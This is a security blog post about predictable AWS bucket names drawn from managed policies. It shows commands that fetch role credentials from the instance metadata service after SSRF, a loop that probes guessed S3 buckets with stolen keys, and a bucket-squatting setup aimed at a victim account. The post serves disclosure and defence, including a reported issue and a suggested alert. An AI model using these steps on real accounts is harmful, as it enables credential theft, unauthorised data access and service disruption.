AWS resource naming patterns

2019.02.10

Recently @notsosecure posted an interesting blog post titled Exploiting SSRF in AWS Elastic Beanstalk. It starts off with using SSRF to reach 169.254.169.254 and obtain session credentials from the target. Where the post gets interesting is when they can’t run aws s3 ls, but based on the role name they do some searching and discover they have access to the S3 bucket elasticbeanstalk-us-east-2-69XXXXXXXX79. In this post I explore the resource naming patterns that AWS relies on.
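For context, the metadata requests behind that first step look roughly like this (ROLE_NAME is a placeholder for whatever role name the first request returns):

# Ask the instance metadata service which role is attached to the instance
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/

# Fetch temporary credentials for that role; the response includes
# AccessKeyId, SecretAccessKey, and Token
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_NAME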

AWS managed policies are IAM policies used by AWS services or recommended by AWS to perform common functions. I’ve written previously about the problems and dangers of using AWS managed policies in my post AWS Managed Policies are an anti-pattern. The interesting thing about these policies, and about the AWS docs more generally, is that you often run into resource naming patterns that services either rely on or use as defaults. An example is the S3 bucket name elasticbeanstalk-REGION-ACCOUNTID that ElasticBeanstalk uses, as discussed in the NotSoSecure post. Another example is that the Athena service by default stores its results in the S3 bucket aws-athena-query-results-ACCOUNTID-REGION. In the case of the NotSoSecure post, they didn’t have privileges to list the buckets in the account, but they did have privileges to list, read, and write objects in this one bucket once they knew its name.
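To make that concrete: once you have credentials and the account ID, checking one of these buckets is a single call (the account ID and region below are placeholders):

# List objects in the guessed Elastic Beanstalk bucket
aws s3 ls s3://elasticbeanstalk-us-east-2-123456789012/

# The default Athena results bucket uses the other ordering
aws s3 ls s3://aws-athena-query-results-123456789012-us-east-2/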

I was curious what other naming patterns exist and decided to compile a list by looking at the AWS managed policies that grant access to these resources. In the case of ElasticBeanstalk, you can see it allows access to S3 buckets that match elasticbeanstalk-* in this statement from the managed policy [AWSElasticBeanstalkWebTier](https://github.com/SummitRoute/aws_managed_policies/blob/ad4c2e8fdf77143515c3ca9f6efc0f4181ec6955/policies/AWSElasticBeanstalkWebTier#L15):

{
    "Action": [
        "s3:Get*", 
        "s3:List*", 
        "s3:PutObject"
    ], 
    "Resource": [
        "arn:aws:s3:::elasticbeanstalk-*", 
        "arn:aws:s3:::elasticbeanstalk-*/*"
    ], 
    "Effect": "Allow", 
    "Sid": "BucketAccess"
}

In the case of Athena, you can see the managed policy AmazonAthenaFullAccess allows access to S3 buckets that match the pattern aws-athena-query-results-*.

My first step was to download all of the managed policies. I’ve put them in the git repo aws_managed_policies along with instructions on how I collected them.
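The repo documents the exact steps I used; the general approach is along these lines (a sketch, not the repo’s exact commands):

# Download the default version of every AWS-managed policy into policies/
mkdir -p policies
for arn in $(aws iam list-policies --scope AWS --query 'Policies[].Arn' --output text); do
    version=$(aws iam get-policy --policy-arn "$arn" --query 'Policy.DefaultVersionId' --output text)
    name=$(basename "$arn")
    aws iam get-policy-version --policy-arn "$arn" --version-id "$version" > "policies/$name"
done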

With the policies as files, I then ran:

cat policies/* | jq '.PolicyVersion.Document.Statement[].Resource' | sed 's/  //' | sort | uniq

That command misses policies whose Statement is a single object instead of an array; adding in the resources from those policies as well, we get the list shown in the gist here.
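A variant of that pipeline which handles both shapes (and Resource being either a single string or an array) could look something like this:

cat policies/* | jq -r '
  .PolicyVersion.Document.Statement
  | if type == "array" then .[] else . end   # Statement may be an array or a single object
  | .Resource?
  | if type == "array" then .[] else . end   # Resource may be an array or a single string
  | strings                                  # drop statements without a Resource
  ' | sort -u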

One strategy, if you end up with access keys but no ability to list buckets, would be to run aws sts get-caller-identity (a call that always works) to get the ACCOUNTID, and then try those S3 bucket names with -REGION-ACCOUNTID or -ACCOUNTID-REGION appended, iterating through the 16 region names, as sketched below.
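A rough sketch of that (the region list and bucket prefixes here are illustrative, not exhaustive):

# The account ID is embedded in the caller identity, which we can always read
account=$(aws sts get-caller-identity --query Account --output text)

for region in us-east-1 us-east-2 us-west-1 us-west-2 eu-west-1 eu-central-1 ap-southeast-1 ap-northeast-1; do
    for bucket in "elasticbeanstalk-$region-$account" "aws-athena-query-results-$account-$region"; do
        # A successful listing means we can see (and likely read/write) objects in this bucket
        aws s3 ls "s3://$bucket/" >/dev/null 2>&1 && echo "Accessible: $bucket"
    done
done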

Looking at that list, an interesting value is appstream2-36fb080bb8-*, which is documented for AppStream here as appstream2-36fb080bb8-REGION-ACCOUNTID. I guess that 36fb080bb8 is supposed to be a “secret” value to make this harder to find? It is hard-coded for all accounts, though.

An interesting result of AWS’s reliance on hard-coded patterns like this is that an attacker could squat on these bucket names for an account by creating those buckets in their own account before the target does. If the target ever tries to use one of these services, the result can be a denial of service, since the service can’t read and write the objects it expects to. Another strategy for the attacker would be to create the bucket and make it readable and writable by the target account. In my testing, the AWS services don’t check that the bucket is owned by your own account, so they’ll happily read and write objects in this attacker-controlled bucket. In my testing, as an attacker I couldn’t actually read the written objects, but I could delete them; I only tested one of these services though. I reported this to AWS, and they view it as an accepted risk, which seems reasonable given the limited impact, but personally I think AWS should restrict the ability of accounts to create buckets with names like these.
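As an illustration of the squatting setup (the victim account ID 123456789012, the region, and the bucket name are all placeholders):

# In the attacker's account: claim the bucket name the victim's service will expect
aws s3api create-bucket --bucket elasticbeanstalk-us-east-2-123456789012 \
    --region us-east-2 --create-bucket-configuration LocationConstraint=us-east-2

# Grant the victim account read/write so its service uses the bucket without error
aws s3api put-bucket-policy --bucket elasticbeanstalk-us-east-2-123456789012 --policy '{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Principal": {"AWS": "arn:aws:iam::123456789012:root"},
    "Action": ["s3:ListBucket", "s3:GetObject", "s3:PutObject"],
    "Resource": [
      "arn:aws:s3:::elasticbeanstalk-us-east-2-123456789012",
      "arn:aws:s3:::elasticbeanstalk-us-east-2-123456789012/*"
    ]
  }]
}'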

Anyway, as an attacker, if you get an AWS access key but can’t list buckets in an account, you might want to try to list objects in the bucket patterns listed here. As a defender, you could create alerts for failed queries against these buckets (/me nudges the GuardDuty team).